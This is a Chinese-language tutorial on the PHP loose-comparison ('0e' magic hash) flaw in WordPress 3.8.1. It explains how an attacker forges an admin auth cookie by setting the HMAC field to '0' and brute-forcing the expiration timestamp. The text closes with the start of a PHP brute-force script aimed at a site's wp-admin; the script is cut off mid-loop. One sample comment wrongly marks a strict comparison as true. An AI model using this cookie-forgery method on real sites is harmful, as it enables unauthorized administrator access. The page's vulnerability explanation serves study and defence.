PHP弱类型：WordPress Cookie伪造，wordpresscookie

PHP弱类型：WordPress Cookie伪造，wordpresscookie

1 PHP弱类型

　　PHP是弱类型语言，所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 ！= 进行相等判断时，会自动进行类型转换，用 === 以及 ！== 进行判断时不会自动转换类型。

1 php
2     $a = 3;
3     $b = '3vic';
4     var_dump($a == $b);//true
5     var_dump($a != $b);//false
6     var_dump($a === $b);//true
7     var_dump($a !== $b);//false
8 ?>

　说明：在PHP中字符串转换成整型时，如果是数字开头就会转换成前面的数字（'3vic' -> 3），如果不是数字开头，那么就会转换成0（'vic' -> 0）

2 WordPress代码

• WordPress 3.8.1 与 WordPress 3.8.2 部分代码区别

1 php
2     // WordPress 3.8.1
3     if ($hmac != $hash) {}
4     // WordPress 3.8.2
5     if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) )  {}
6 ?>

• Cookie 组成

　　客户端后台只验证其中的一条Cookie，如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

　　其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl) 其中siteurl为WordPress的网址，此处网站地址为http://www.test.ichunqiu,md5加密后为c47f4a97d0321c1980bb76fc00d1e78f，其它部分也可省。

类型　　　　　　用户名　　　　　过期时间　　　　　　　　登录成功服务器端赋予客户端的hash值

• 分析验证登录

　　代码 wp-includes/pluggable.php 第543-549行

1 php
2     $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
3     $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
4     if ( $hmac != $hash ) {
5     do_action('auth_cookie_bad_hash', $cookie_elements);
6     return false;
7 }

　　在代码所使用的变量中，通过改变客户端Cookie 的方式可控的有 $username 用户名，$expiration 有效期，又因为其中用户名是固定的，因此只有$expiration是可控的，所以我们可以从改变 $expiration 的方法来改变$hash。

• 结合PHP Hash 比较缺陷分析 WordPress

　　有以下几种可能使 $hmac == $hash 为真，字符串完全相等或者 $hmac 等于0的同时 $hash 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0，然后在if ( $hmac != $hash ) {的上面一行写入var_dump($hmac);die();发现打印出来 $hmac 的结果是 string '0'而不是int 0， 那么有没有方法使字符串识别为整数呢，代码如下：

1 php
2 var_dump('0' == '0e156464513131');//true

　　其中的 0e156464513131 会被识别为0乘以10的156464513131次方，还是得0；因此当 $hash 以0e开头后面全是数字时就会与 $hmac 的值为 '0' 时相等，所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间（现在1433403595的位置）的方法来碰撞服务器端，一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功，就修改浏览器的Cookie，直接访问后台地址，就可以成功登陆后台。

3 测试脚本

　　通过改变客户端Cookie里过期时间的值，不断尝试登录后台，找出可以进入后台的时间戳，从而实现Cookie伪造登录后台。

 1 php
 2 /*
 3 
 4 本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
 5 传入两个值
 6   WordPress 的主页 $host
 7   管理员用户名     $root
 8 */
 9     header("Content-type:text/html;charset=utf-8");
10 
11     $host = 'http://xxx.xxx.xxx';//主页地址 结尾不带'/'
12     $root = 'user';//管理员用户名
13 
14     $url = $host.'/wp-admin/';//后台管理地址    
15     $sitehash=md5($host); 
16 
17     echo "\nWelcome\n\n";
18     //通过时间戳暴力破解cookie 实现伪造cookie
19     for($i=1500000000;$i$i